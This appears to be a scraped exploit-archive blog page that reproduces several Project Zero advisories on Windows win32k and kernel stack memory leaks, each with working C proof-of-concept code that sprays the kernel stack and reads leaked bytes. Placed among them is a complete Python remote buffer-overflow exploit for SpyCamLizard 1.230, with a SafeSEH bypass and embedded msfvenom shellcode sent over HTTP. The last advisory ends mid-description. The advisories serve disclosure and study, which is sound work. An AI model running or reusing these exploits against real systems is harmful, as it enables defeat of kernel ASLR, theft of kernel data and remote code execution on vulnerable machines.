/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1180
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other systems untested) through the win32k!NtGdiGetTextMetricsW system call.
The output structure used by the syscall, according to various sources, is TMW_INTERNAL, which wraps the TEXTMETRICW and TMDIFF structures (see e.g. the PoC for issue #480 ). The disclosure occurs when the service is called against a Device Context with one of the stock fonts selected (we're using DEVICE_DEFAULT_FONT). Then, we can find 7 uninitialized kernel stack bytes at offsets 0x39-0x3f of the output buffer. An example output of the attached proof-of-concept program started on Windows 7 32-bit is as follows:
--- cut ---
00000000: 10 00 00 00 0d 00 00 00 03 00 00 00 03 00 00 00 ................
00000010: 00 00 00 00 07 00 00 00 0f 00 00 00 bc 02 00 00 ................
00000020: 00 00 00 00 60 00 00 00 60 00 00 00 20 00 22 21 ....`...`... ."!
00000030: ac 20 20 00 00 00 00 21 ee[03 81 ff 35 64 36 8f]. ....!....5d6.
00000040: 20 ff 80 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? .. ............
--- cut ---
Here, the leaked bytes are "03 81 ff 35 64 36 8f". If we map the 0x39-0x3f offsets to the layout of the TMW_INTERNAL structure, it turns out that the 7 bytes in question correspond to the 3 alignments bytes past the end of TEXTMETRICSW (which itself has an odd length of 57 bytes), and the first 4 bytes of the TMDIFF structure.
Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiGetTextMetricsW = 0x10d9;
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Get a handle to the stock font.
HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
if (hfont == NULL) {
printf("GetCurrentObject failed\n");
return 1;
}
// Select the font into the DC.
SelectObject(hdc, hfont);
// Trigger the vulnerability and dump the kernel output on stdout.
BYTE output[0x44] = { /* zero padding */ };
if (!SystemCall32(__NR_NtGdiGetTextMetricsW, hdc, output, sizeof(output))) {
printf("NtGdiGetTextMetricsW failed\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
PrintHex(output, sizeof(output));
// Free resources.
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582985
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1181
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetRealizationInfo system call.
The concrete layout of the input/output structure is unclear (symbols indicate its name is FONT_REALIZATION_INFO), but the first DWORD field contains the structure size, which can be either 16 or 24. The internal win32k!GreGetRealizationInfo function then initializes a local copy of the structure on the kernel stack with an adequate number of bytes. However, the syscall handler later copies the full 24 bytes of memory back to user-mode, regardless of the declared size of the structure, and the number of bytes initialized within it:
--- cut ---
.text:BF86F307 mov edi, ecx
.text:BF86F309
.text:BF86F309 loc_BF86F309:
.text:BF86F309 push 6
.text:BF86F30B pop ecx
.text:BF86F30C lea esi, [ebp+var_30]
.text:BF86F30F rep movsd
--- cut ---
In other words, if we pass in a structure with .Size set to 16, the kernel will leak 8 uninitialized stack bytes back to us. This condition is illustrated by the attached proof-of-concept program, which first sprays 1024 bytes of the kernel stack with the 0x41 ('A') value, and then invokes the affected system call. The result of starting the program on Windows 7 32-bit is as follows:
--- cut ---
00000000: 10 00 00 00 03 01 00 00 2d 00 00 00 65 00 00 46 ........-...e..F
00000010: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
--- cut ---
It is clearly visible that the 8 trailing bytes are set to the leftover 'A's artificially set up to demonstrate the security issue.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
// Own implementation of memset(), which guarantees no data is spilled on the local stack.
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiGetRealizationInfo = 0x10cb;
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Create a TrueType font.
HFONT hfont = CreateFont(10, // nHeight
10, // nWidth
0, // nEscapement
0, // nOrientation
FW_DONTCARE, // fnWeight
FALSE, // fdwItalic
FALSE, // fdwUnderline
FALSE, // fdwStrikeOut
ANSI_CHARSET, // fdwCharSet
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
DEFAULT_QUALITY, // fdwQuality
FF_DONTCARE, // fdwPitchAndFamily
L"Times New Roman");
// Select the font into the DC.
SelectObject(hdc, hfont);
// Spray the kernel stack to get visible results.
SprayKernelStack();
// Read the uninitialized kernel stack bytes and print them on screen.
DWORD output[6] = { /* zero padding */ };
output[0] = 16;
if (!SystemCall32(__NR_NtGdiGetRealizationInfo, hdc, output)) {
printf("NtGdiGetRealizationInfo failed\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
PrintHex((PBYTE)output, sizeof(output));
// Free resources.
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1179
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetOutlineTextMetricsInternalW system call.
The system call returns an 8-byte structure back to ring-3 through the 4th parameter, as evidenced by the following assembly code (win32k.sys from Windows 7 32-bit):
--- cut ---
.text:BF87364A mov edx, [ebp+arg_C]
.text:BF87364D lea ecx, [edx+8]
.text:BF873650 mov eax, _W32UserProbeAddress
.text:BF873655 cmp ecx, eax
.text:BF873657 ja short loc_BF873662
.text:BF873659 cmp ecx, edx
.text:BF87365B jbe short loc_BF873662
.text:BF87365D test dl, 3
.text:BF873660 jz short loc_BF873665
.text:BF873662
.text:BF873662 loc_BF873662:
.text:BF873662 mov byte ptr [eax], 0
.text:BF873665
.text:BF873665 loc_BF873665:
.text:BF873665 lea esi, [ebp+var_24]
.text:BF873668 mov edi, edx
.text:BF87366A movsd
.text:BF87366B movsd
--- cut ---
However, according to our experiments, only the first 4 bytes of the source structure (placed on the kernel stack) are initialized under normal circumstances, while the other 4 bytes are set to leftover data. In order to demonstrate the issue, we have created a proof-of-concept program which sprays 1024 bytes of the kernel stack with a 0x41 ('A') byte directly prior to triggering the vulnerability, with the help of the win32k!NtGdiEngCreatePalette system call. Then, the DWORD leaked via the discussed vulnerability is indeed equal to 0x41414141, as evidenced by the PoC output:
--- cut ---
C:\>NtGdiGetOutlineTextMetricsInternalW_stack.exe
Data read: 41414141
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
// Own implementation of memset(), which guarantees no data is spilled on the local stack.
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiGetOutlineTextMetricsInternalW = 0x10c6;
// Create a Device Context.
HDC hdc = CreateCompatibleDC(NULL);
// Create a TrueType font.
HFONT hfont = CreateFont(10, // nHeight
10, // nWidth
0, // nEscapement
0, // nOrientation
FW_DONTCARE, // fnWeight
FALSE, // fdwItalic
FALSE, // fdwUnderline
FALSE, // fdwStrikeOut
ANSI_CHARSET, // fdwCharSet
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
DEFAULT_QUALITY, // fdwQuality
FF_DONTCARE, // fdwPitchAndFamily
L"Times New Roman");
// Select the font into the DC.
SelectObject(hdc, hfont);
// Spray the kernel stack to get visible results.
SprayKernelStack();
// Read the 4 uninitialized kernel stack bytes and print them on screen.
DWORD output[2] = { /* zero padding */ };
if (!SystemCall32(__NR_NtGdiGetOutlineTextMetricsInternalW, hdc, 0, NULL, output)) {
printf("NtGdiGetOutlineTextMetricsInternalW failed\n");
DeleteObject(hfont);
DeleteDC(hdc);
return 1;
}
printf("Data read: %x\n", output[1]);
// Free resources.
DeleteObject(hfont);
DeleteDC(hdc);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1178
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory in Windows 7-10 through the win32k!NtGdiExtGetObjectW system call (accessible via a documented GetObject() API function) to user-mode applications.
The reason for this seems to be as follows: logical fonts in Windows are described by the LOGFONT structure [1]. One of the structure's fields is lfFaceName, a 32-character array containing the typeface name. Usually when logical fonts are created (e.g. with the CreateFont() or CreateFontIndirect() user-mode functions), a large part of the array remains uninitialized, as most font names are shorter than the maximum length. For instance, the CreateFont() API only copies the relevant string up until \0, and leaves the rest of its local LOGFONT structure untouched. In case of CreateFontIndirect(), it is mostly up to the caller to make sure there are no leftover bytes in the structure, but we expect this is rarely paid attention to. The structure is then copied to kernel-mode address space, but can be read back using the GetObject() function, provided that the program has a GDI handle to the logical font.
Now, it turns out that the trailing, uninitialized bytes of the LOGFONT structure for some of the stock fonts contain left-over kernel stack data, which include kernel pointers, among other potentially interesting information. An example output of the attached proof-of-concept program (which obtains and displays the LOGFONT of the DEVICE_DEFAULT_FONT stock font) started on Windows 7 32-bit is as follows:
--- cut ---
00000000: 10 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: bc 02 00 00 00 00 00 ee 01 02 02 22 53 00 79 00 ..........."S.y.
00000020: 73 00 74 00 65 00 6d 00 00 00 29 92 24 86 6d 81 s.t.e.m...).$.m.
00000030: fb 4d f2 ad fe ff ff ff 63 76 86 81 76 79 86 81 .M......cv..vy..
00000040: 10 38 c7 94 02 00 00 00 00 00 00 00 01 00 00 00 .8..............
00000050: d0 03 69 81 10 38 c7 94 04 7a 00 00 ?? ?? ?? ?? ..i..8...z......
--- cut ---
After the "System" unicode string, we can observe data typical to a function stack frame: a _EH3_EXCEPTION_REGISTRATION structure at offset 0x28:
.Next = 0x9229???? (truncated)
.ExceptionHandler = 0x816d8624
.ScopeTable = 0xadf24dfb
.TryLevel = 0xfffffffe
as well as pointers to the ntoskrnl.exe kernel image (0x81867663, 0x81867976, 0x816903d0) and paged pool (0x94c73810). This information is largely useful for local attackers seeking to defeat the kASLR exploit mitigation, and the bug might also allow disclosing other sensitive data stored in the kernel address space. We have confirmed that more data can be easily leaked by querying other stock fonts. It is unclear whether disclosing junk stack data from other user-mode processes which create logical fonts is possible, but this scenario should also be investigated and addressed if necessary.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Get a handle to the stock font.
HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
if (hfont == NULL) {
printf("GetCurrentObject failed\n");
return 1;
}
// Zero-out the logfont memory to prevent any artifacts in the output.
LOGFONT logfont;
RtlZeroMemory(&logfont, sizeof(logfont));
// Trigger the bug.
if (GetObject(hfont, sizeof(logfont), &logfont) == 0) {
printf("GetObject failed\n");
DeleteObject(hfont);
return 1;
}
// Dump the output on screen.
PrintHex((PBYTE)&logfont, sizeof(logfont));
return 0;
}
#!/usr/bin/python
###############################################################################
# Exploit Title: SpyCamLizard v1.230 Remote Buffer Overflow (SafeSEH Bypass)
# Date: 20-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: SpyCamLizard
# Vendor Homepage: http://www.spycamlizard.com/
# Version: 1.230
# Software Link: http://spycamlizard.com/SpyCamLInstaller.exe
# Tested On: WinXP SP3 x86
#
# Credit to ScrR1pTK1dd13 for discovering the PoC (41667).
#
##############################################################################
import socket
import sys
host = "127.0.0.1"
port = 80
nSEH = "\xeb\x10\x90\x90"
# -----------------------------------------------------------------------------------------------------------------------------------------
# Module info :
# -----------------------------------------------------------------------------------------------------------------------------------------
# Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
# -----------------------------------------------------------------------------------------------------------------------------------------
# 0x10000000 | 0x100d6000 | 0x000d6000 | False | True | False | False | False | 1.0.0.1 [ZTcore.dll] (C:\Program Files\SpyCam Lizard\ZTcore.dll)
# 0x00400000 | 0x006ea000 | 0x002ea000 | False | False | False | False | False | 1.230 [SCLiz.exe] (C:\Program Files\SpyCam Lizard\SCLiz.exe)
# -----------------------------------------------------------------------------------------------------------------------------------------
#
# Sine 1) SCLiz.exe always has a null byte for any address, 2) partial overwrite didn't work and 3)ZTcore.dll had SafeSEH enabled, none of the addresses in these modules could be used.
# Luckily the output of "!mona seh -all" contained this entry and seemed to always work for WinXP SP3 x86 (kinda awful being on heap but seems to work):
# 0x01726017 : call dword ptr ss:[ebp-18] | ascii {PAGE_READWRITE} [Heap]
# This won't work on later versions of Windows thanks to ASLR
SEH = "\x17\x60\x72\x01"
llamaleftovers = (
# Since we used call dword ptr ss:[ebp-18] instead of POP POP RET, we can POP 4 times to get the current location.
# Now EAX contains address of instruction jumped to right after executing call dword ptr ss:[ebp-18]
"\x58\x58\x58\x58"
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = oldEAX + 0x100, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python
# Payload size: 440 bytes
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x59\x6c\x6a\x48\x6f\x72\x57\x70\x77\x70\x75\x50\x71"
buf += "\x70\x4d\x59\x79\x75\x66\x51\x6b\x70\x53\x54\x4e\x6b"
buf += "\x30\x50\x66\x50\x6c\x4b\x76\x32\x34\x4c\x4c\x4b\x31"
buf += "\x42\x77\x64\x6e\x6b\x51\x62\x75\x78\x66\x6f\x68\x37"
buf += "\x52\x6a\x56\x46\x76\x51\x69\x6f\x6e\x4c\x37\x4c\x75"
buf += "\x31\x73\x4c\x54\x42\x54\x6c\x51\x30\x4a\x61\x6a\x6f"
buf += "\x36\x6d\x36\x61\x68\x47\x69\x72\x79\x62\x50\x52\x73"
buf += "\x67\x6c\x4b\x32\x72\x56\x70\x4e\x6b\x30\x4a\x57\x4c"
buf += "\x6e\x6b\x52\x6c\x46\x71\x44\x38\x59\x73\x30\x48\x47"
buf += "\x71\x58\x51\x43\x61\x4e\x6b\x52\x79\x71\x30\x45\x51"
buf += "\x48\x53\x4e\x6b\x67\x39\x44\x58\x79\x73\x54\x7a\x50"
buf += "\x49\x6c\x4b\x65\x64\x4c\x4b\x76\x61\x39\x46\x44\x71"
buf += "\x69\x6f\x6c\x6c\x4f\x31\x78\x4f\x56\x6d\x76\x61\x38"
buf += "\x47\x44\x78\x79\x70\x51\x65\x6b\x46\x57\x73\x53\x4d"
buf += "\x68\x78\x65\x6b\x73\x4d\x56\x44\x73\x45\x5a\x44\x70"
buf += "\x58\x6e\x6b\x61\x48\x35\x74\x66\x61\x6b\x63\x30\x66"
buf += "\x6c\x4b\x34\x4c\x70\x4b\x4e\x6b\x46\x38\x75\x4c\x63"
buf += "\x31\x78\x53\x4c\x4b\x35\x54\x4e\x6b\x55\x51\x6e\x30"
buf += "\x4d\x59\x77\x34\x44\x64\x74\x64\x31\x4b\x51\x4b\x70"
buf += "\x61\x70\x59\x71\x4a\x42\x71\x39\x6f\x4b\x50\x53\x6f"
buf += "\x71\x4f\x62\x7a\x4e\x6b\x35\x42\x6a\x4b\x6c\x4d\x63"
buf += "\x6d\x73\x5a\x33\x31\x6e\x6d\x6c\x45\x58\x32\x45\x50"
buf += "\x35\x50\x55\x50\x56\x30\x42\x48\x56\x51\x4e\x6b\x62"
buf += "\x4f\x6e\x67\x49\x6f\x6e\x35\x4d\x6b\x4a\x50\x6f\x45"
buf += "\x69\x32\x71\x46\x45\x38\x6e\x46\x6e\x75\x4f\x4d\x6f"
buf += "\x6d\x69\x6f\x6b\x65\x67\x4c\x57\x76\x31\x6c\x46\x6a"
buf += "\x4b\x30\x6b\x4b\x4d\x30\x70\x75\x75\x55\x4f\x4b\x71"
buf += "\x57\x46\x73\x51\x62\x52\x4f\x51\x7a\x55\x50\x70\x53"
buf += "\x59\x6f\x58\x55\x50\x63\x63\x51\x30\x6c\x72\x43\x74"
buf += "\x6e\x65\x35\x44\x38\x71\x75\x33\x30\x41\x41"
junk1 = "A" * 1173
junk2 = "B"*16
junk3 = "C"*213
junk4 = "D"*3000
exploit = junk1 + nSEH + SEH + junk2 + llamaleftovers + junk3 + buf + junk4
httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
httpsocket.close()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1177
According to our tests, the generic exception dispatching code present in the Windows kernel (Windows 7-10) discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for the ring-3 exception handlers.
The attached proof-of-concept program can be used to reproduce the issue. It works by first spraying a full page of the kernel stack with a 0x41 byte ('A') using the nt!NtMapUserPhysicalPages system call (see [1]), then also spraying a page of user-mode stack (to recognize any false-positives) with a 0x78 ('x') byte, followed by raising an exception with a RaiseException() call and dumping the contents of the CONTEXT structure provided to the unhandled exception filter function. After running the program, we should observe the 'A' byte on output in place of disclosed kernel memory.
On most tested platforms (Windows 7 64-bit, Windows 10 32/64-bit), running the 32-bit proof-of-concept program reveals 4 bytes of kernel stack memory at offset 0x88 of the structure. An example output is as follows:
--- cut ---
00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................
00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080: 00 00 00 00 00 00 00 00[41 41 41 41]2b 00 00 00 ........AAAA+...
00000090: 53 00 00 00 2b 00 00 00 2b 00 00 00 50 fe 32 00 S...+...+...P.2.
000000a0: 84 fd 32 00 00 e0 fd 7e 00 00 00 00 85 3c 1d 59 ..2....~.....<.Y
000000b0: 1c fd 32 00 6c fd 32 00 4f c5 72 75 23 00 00 00 ..2.l.2.O.ru#...
000000c0: 46 02 00 00 1c fd 32 00 2b 00 00 00 7f 02 00 00 F.....2.+.......
000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................
000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................
--- cut ---
Offset 0x88 of the CONTEXT structure on x86 corresponds to the 32-bit CONTEXT.FloatSave.Cr0NpxState field, which appears to remain in an uninitialized state before being copied to user-mode. We have tested that with the kernel stack spraying disabled, these bytes contain varying values originating from the kernel memory space.
On Windows 7 32-bit, we're observing a slightly different output:
--- cut ---
00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................
00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090: 3b 00 00 00 23 00 00 00 23 00 00 00 0c fe 2a 00 ;...#...#.....*.
000000a0: 40 fd 2a 00 00 f0 fd 7f 74 6c 8e 77 89 bb c8 38 @.*.....tl.w...8
000000b0: d8 fc 2a 00 28 fd 2a 00 5d 84 c3 75 1b 00 00 00 ..*.(.*.]..u....
000000c0: 46 02 00 00 d8 fc 2a 00 23 00 00 00 7f 02 00 00 F.....*.#.......
000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................
000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....
--- cut ---
Here, we can see that 32 bytes from the kernel stack are leaked at the end of the CONTEXT structure, which correspond to the last bytes of the CONTEXT.ExtendedRegisters array. We have confirmed that when the spraying function is not invoked, this memory region discloses valid kernel-mode pointers.
